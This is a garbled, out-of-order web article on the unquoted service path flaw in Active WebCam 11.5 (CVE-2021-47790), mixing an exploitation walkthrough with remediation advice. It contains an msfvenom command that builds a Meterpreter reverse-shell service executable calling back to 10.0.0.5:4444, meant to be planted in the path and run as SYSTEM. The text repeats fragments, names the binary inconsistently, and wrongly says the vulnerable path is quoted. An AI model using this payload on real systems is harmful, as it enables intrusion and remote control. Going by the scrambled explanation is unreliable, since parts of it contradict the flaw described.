For example, if the service binary path is C:\Program Files\Active WebCam\WebCam.exe :
Locate the subkey corresponding to the Active Webcam service (e.g., WebcamService ). Find the ImagePath value in the right pane.
The severity of CVE‑2021‑47790 cannot be overstated. An unquoted service path vulnerability that leads to LocalSystem execution has the following consequences:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe-service -o Active.exe Use code with caution.
Active WebCam 11.5 Unquoted Service Path Patched: Securing Windows Privilege Escalation active webcam 115 unquoted service path patched
When the computer restarts or the service is restarted, Windows locates the malicious Active.exe first, executes it with SYSTEM privileges, and compromises the machine.
Ensure standard user accounts do not possess write permissions to the root directory ( C:\ ) or the subdirectories of C:\Program Files\ and C:\Program Files (x86)\ . If users cannot drop a malicious .exe file into the path, the vulnerability cannot be exploited.
Given that this vulnerability has now been patched, system administrators have clear options for remediation. The keyword "patched" indicates that a fix is available, and applying it is the most direct and effective course of action.
"C:\Program Files\Active WebCam\webcam.exe" For example, if the service binary path is
The attacker analyzes the vulnerable path: C:\Program Files\Active WebCam\WebCam.exe . The attack model relies on placing a malicious executable earlier in the path.
of Active WebCam from the official PY Software website or from trusted software repositories (e.g., TechSpot, Softpedia).
CVE-2021-47790 CWE: CWE-428 (Unquoted Search Path or Element) CVSS 3.1 Base Score: 7.8 (High) CVSS 4.0 Base Score: 8.5 (High) Affected Software: Active WebCam version 11.5
The vulnerability occurs when a Windows service is installed with a path that contains spaces (e.g., C:\Program Files\Active WebCam\awc.exe An unquoted service path vulnerability that leads to
by running the installer. If you are currently using version 11.5, the installer will automatically upgrade the software to version 11.6.
The security issue arises when this path contains spaces, such as in C:\Program Files\Active WebCam\WebCam.exe , and is surrounded by double quotation marks. In this scenario, the SCM's parser does not read the entire string as a single command. Instead, it attempts to find and execute the file by walking through each segment of the path sequentially until it locates a valid executable. This process creates dangerous opportunities for an attacker.
sc config ActiveWebCamService binPath= "\"C:\Program Files\Active WebCam\webcam.exe\""
wmic service get name,displayname,pathname,startmode | findstr /i "Active" Use code with caution.